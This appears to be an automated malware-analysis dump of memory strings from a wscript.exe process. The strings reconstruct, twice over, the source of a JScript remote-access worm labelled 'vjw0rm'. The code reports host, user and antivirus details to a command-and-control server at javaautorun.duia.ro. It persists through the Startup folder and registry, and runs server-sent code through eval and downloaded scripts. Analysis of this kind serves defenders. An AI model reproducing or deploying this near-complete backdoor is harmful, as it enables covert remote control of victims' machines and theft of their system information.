Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vn = vn.split("_");
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fr = fr.replace(vn[0],p[1]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var wi = fs.opentextfile(fu,2,false);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wi.write(fr);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wi.close();
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sh.run("wscript.exe //b \"" + fu + "\"");
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "up") {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var ctf = fs.createtextfile(s2,true);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var gu = p[1];
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gu = gu.replace("|u|","|v|");
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ctf.write(gu);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ctf.close();
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sh.run("wscript.exe //b \"" + s2 + "\"",6);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "un") {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var s2 = p[1];
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var vdr = fu;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var regi = "nothing!";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%rgne%",regi);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eval(s2);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "rf") {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript.sleep(7000);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: } while (true) ;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function ex(s) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return sh.expandenvironmentstrings("%" + s + "%");
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function pt(c,a) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var x = cr(3);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x.open('post','http://javaautorun.duia.ro:5465/' + c, false);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x.setrequestheader("user-agent:",nf());
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x.send(a);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return x.responsetext;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function nf() {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var s,nt,i;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (fs.fileexists(ex("windir") + "\\microsoft.net\\framework\\v2.0.50727\\vbc.exe")) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nt ="yes";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nt = "no";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s = vn + ch + ex("computername") + ch + ex("username") + ch + ob(2) + ch + ob(4) + ch + ch + nt + ch + u + ch;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return s;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function cr(n) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return new activexobject(j[n]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function ob(n) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var s;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (n == 2) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s = getobject(y[0]).instancesof(y[2]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var en = new enumerator(s);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for (; !en.atend();en.movenext()) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var it = en.item();
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return it.caption;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: break;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (n == 4) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s = getobject(wmg).instancesof(y[3]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var str = it.displayname;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (str !== '') {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wmg = wmg + "2";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: en = new enumerator(s);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: it = en.item();
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return it.displayname;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (n==6) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s = getobject(y[0]).instancesof(y[1]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return it.volumeserialnumber;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function ns() {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: try {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var ap = cr(2);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fs.copyfile(fu, ap.namespace(7).self.path + "\\" + wn,true);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: } catch(err) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :eval code// coded by v_b01 | sliemerez -> twitter : sliemerez
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var j = ["wscript.shell","scripting.filesystemobject","shell.application","microsoft.xmlhttp"];
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var g = ["hkcu","hklm","hkcu\\vjw0rm","\\software\\microsoft\\windows\\currentversion\\run\\","hklm\\software\\classes\\","reg_sz","\\defaulticon\\"];
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var y = ["winmgmts:","win32_logicaldisk","win32_operatingsystem",'antivirusproduct'];
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var sh = cr(0);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var fs = cr(1);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var spl = "|v|";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var ch = "\\";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var vn = "9/21" + "_" + ob(6);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var fu = wscript.scriptfullname;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var wn = wscript.scriptname;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var u;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: try {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: u = sh.regread(g[2]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: } catch(err) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var sv = fu.split("\\");
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (":\\" + sv[1] == ":\\" + wn) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: u = "true";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sh.regwrite(g[2],u,g[5]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: } else {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: u = "false";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ns();
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var p = pt('vre','');
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: p = p.split(spl);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "cl") {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript.quit(1);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "sc") {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var s2 = ex("temp") + "\\" + p[2];
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var fi = fs.createtextfile(s2,true);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fi.write(p[1]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fi.close();
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sh.run(s2);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "ex") {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eval(p[1]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "rn") {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var ri = fs.opentextfile(fu,1);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var fr = ri.readall();
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ri.close();
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vn = vn.split("_");
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fr = fr.replace(vn[0],p[1]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var wi = fs.opentextfile(fu,2,false);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wi.write(fr);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wi.close();
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sh.run("wscript.exe //b \"" + fu + "\"");
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "up") {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var ctf = fs.createtextfile(s2,true);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var gu = p[1];
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gu = gu.replace("|u|","|v|");
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ctf.write(gu);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ctf.close();
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sh.run("wscript.exe //b \"" + s2 + "\"",6);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "un") {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var s2 = p[1];
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var vdr = fu;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var regi = "nothing!";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%rgne%",regi);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eval(s2);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "rf") {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript.sleep(7000);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: } while (true) ;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function ex(s) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return sh.expandenvironmentstrings("%" + s + "%");
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function pt(c,a) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var x = cr(3);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x.open('post','http://javaautorun.duia.ro:5465/' + c, false);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x.setrequestheader("user-agent:",nf());
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x.send(a);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return x.responsetext;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function nf() {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var s,nt,i;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (fs.fileexists(ex("windir") + "\\microsoft.net\\framework\\v2.0.50727\\vbc.exe")) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nt ="yes";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nt = "no";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s = vn + ch + ex("computername") + ch + ex("username") + ch + ob(2) + ch + ob(4) + ch + ch + nt + ch + u + ch;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return s;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function cr(n) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return new activexobject(j[n]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function ob(n) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var s;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (n == 2) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s = getobject(y[0]).instancesof(y[2]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var en = new enumerator(s);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for (; !en.atend();en.movenext()) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var it = en.item();
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return it.caption;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: break;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (n == 4) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s = getobject(wmg).instancesof(y[3]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var str = it.displayname;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (str !== '') {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wmg = wmg + "2";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: en = new enumerator(s);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: it = en.item();
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return it.displayname;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (n==6) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s = getobject(y[0]).instancesof(y[1]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return it.volumeserialnumber;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function ns() {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: try {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var ap = cr(2);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fs.copyfile(fu, ap.namespace(7).self.path + "\\" + wn,true);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: } catch(err) {
Source: wscript.exe, 00000001.00000002.816780509.00000083BC7FD000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: c:\windows\systep
Source: wscript.exe, 00000001.00000002.816780509.00000083BC7FD000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: kernelbao
Source: wscript.exe, 00000001.00000002.816780509.00000083BC7FD000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: wmapi.d
Source: wscript.exe, 00000001.00000002.816780509.00000083BC7FD000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: local\sm
Source: wscript.exe, 00000001.00000002.816780509.00000083BC7FD000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: wsh-timer
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: root\cimv2
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1root\cimv2:
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: not_null
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: timestamp
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: it32not_nulltimestamp
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: string
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: antivirusproduct
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: windows defender
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {d68ddc3a-831f-4fae-9e44-da132c1acf46}
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: windowsdefender://
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %programfiles%\windows defender\msmpeng.exe
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: thu, 27 jun 2019 08:28:49 gmt
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: antivirusproductwindows defender{d68ddc3a-831f-4fae-9e44-da132c1acf46}windowsdefender://%programfiles%\windows defender\msmpeng.exethu, 27 jun 2019 08:28:49 gmt
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rpcrt4.dll+0xdde1d
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: countrycode
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringcountrycode
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: creationclassname
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringcreationclassname
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cscreationclassname
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringcscreationclassname
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: csdversion
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringcsdversion
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: csname
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringcsname
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: currenttimezone
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringcurrenttimezone
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sint16
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dataexecutionprevention_32bitapplications
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sint16dataexecutionprevention_32bitapplications
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: boolean
